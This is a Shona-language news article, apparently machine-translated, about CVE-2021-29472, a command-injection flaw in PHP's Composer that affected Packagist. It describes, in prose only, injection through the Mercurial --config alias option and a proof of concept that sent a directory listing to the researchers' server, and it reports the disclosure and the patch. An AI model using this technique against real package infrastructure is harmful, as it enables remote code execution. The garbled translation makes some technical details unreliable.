Mazuva mashoma apfuura nhau dzakabvaruka kuti kushupika kwakakomba kwave kuonekwa en maneja wekuvimbika we munyori (CVE-2021-29472) iyo inobvumidza iwe kumhanyisa mirairo pane ino sisitimu kana uchigadzirisa pasuru ine yakasarudzika URL kukosha iyo inosarudza nzira yekurodha pasi sosi kodhi.
Dambudziko rinozviratidza mune zveGitDriver, SvnDriver uye HgDriver zvikamu inoshandiswa neGit, Subversion, uye Mercurial sosi yekudzivirira masisitimu. Iko kunetseka kwakagadziriswa muComposer vhezheni 1.10.22 uye 2.0.13.
Kunyanya, Mutambi anokwana Packagist package repositori, ine 306.000 PHP mapakeji ekuvandudza uye inopa anopfuura 1.400 bhiriyoni kurodha pamwedzi, inonyanya kukanganiswa.
Mune iyo PHP ecosystem, Munyori ndicho chishandiso chikuru chekugadzirisa nekuisa software kutsamira. Matimu Ekuvandudza kutenderera pasirese anoishandisa kudzikamisa maitiro uye kuona kuti mashandiro anomhanya zvisingaite munzvimbo dzese neshanduro.
Iko kuyedza kwakaratidza kuti kana paine ruzivo nezve dambudziko, varwisi vanogona kutora kutonga kwePackagist zvivakwa uye kutorera humbowo hwevanochengeta kana kudzosera kurodha pasi kwemapakeji kune wechitatu-bato server, kuronga kuendeswa kwemapakeji akasiyana neshanduko. yakaipa yekutsiva yekunze kwepashure panguva yekuisa kwekuvimbika.
Njodzi yekugumisa vashandisi ishoma nekuda kwekuti izvo zvemukati composer.json zvinowanzo tsanangurwa nemushandisi uye zvinongedzo kune izvo sosi zvinopfuudzwa kana uchiwana wechitatu-bato repositori, ayo anowanzo kuve akavimbika. Kurova kukuru kwakawira pane Packagist.org repository uye iyo yega Packagist sevhisi, iyo inodaidza Munyori nekutamisirwa kwedata rakagamuchirwa kubva kune vashandisi. Vanorwisa vanogona kumhanyisa kodhi yavo pane maseva ePackagist nekudonhedza pasuru yakagadzirirwa.
Chikwata chePackagist chakagadzirisa kusagadzikana mukati memaawa gumi nemaviri ekuzivisa yekukuvadzwa. Vatsvagiri vakaudza vega Packagist vagadziri muna Kubvumbi 22, uye nyaya yacho yakagadziriswa musi mumwe chete iwoyo. Ruzhinji rweMunyori gadziriso ine gadziriso yekusagadzikana yakaburitswa muna Kubvumbi 27, uye ruzivo rwakaziviswa muna Kubvumbi 28. Kuongororwa kwematanda pamaseva ePackagist hakuna kuratidza chero chiitiko chinokatyamadza chine chekuita nedambudziko.
Kukakavara kwejekiseni jekiseni ikirasi inonakidza yezvikanganiso izvo zvinowanzo kufuratirwa panguva yekuongororwa kwekodhi uye zvinoregererwa zvachose mukubatana kwebhokisi dema
Dambudziko rinokonzerwa nekanganiso mu URL yekusimbisa kodhi mune mudzi composer.json faira uye mune sosi yekurodha zvinongedzo. Iyo bhaggi yave iripo mukodhi kubva munaNovember 2011. Packagist anoshandisa akakosha masenduru kubata kodhi kurodha pasi pasina kusungwa kune yakasarudzika sosi yekudzora sisitimu, inoitwa nekufona "kubva kuShellCommandline" ine command line nharo.
Mwoyo wedambudziko nderekuti ProcessExecutor nzira yakatendera chero mamwe ma parameter ekuti atsanangurwe muURL. Kupukunyuka kwakadaro kwakashaikwa kubva kuGitDriver.php, SvnDriver.php uye HgDriver.php madhiraivha. Kurwiswa kweGitDriver.php kwakatadziswa nenyaya yekuti "git ls-remote" rairo harina kutsigira kutsanangura dzimwe nharo mushure megwara.
Kurwiswa kweHgDriver.php kwakagoneka nekupfuura iyo "-config" paramende kune "hq" utility, iyo inobvumidza kuronga kuitiswa kwechero rairo nekushandura iyo "alias. zivisa" kumisikidzwa.
Nekuendesa bvunzo package ine URL yakafanana kuPackagist, vaongorori vakavimbisa kuti mushure mekuburitswa, server yavo yakagamuchira chikumbiro cheHTTP kubva kune rimwe revava vePackagist paAWS yaive nerunyorwa rwemafaira mune dhairekitori razvino.
Izvo zvinofanirwa kucherechedzwa kuti vanochengetedza havana kuona chero zviratidzo zvekumbobvira kudzvinyirirwa kweichi chinetso mune yeruzhinji muenzaniso wepackagist.
Chekupedzisira, kana iwe uchifarira kuziva zvakawanda nezvazvo, unogona kutarisa ruzivo Mune inotevera chinongedzo.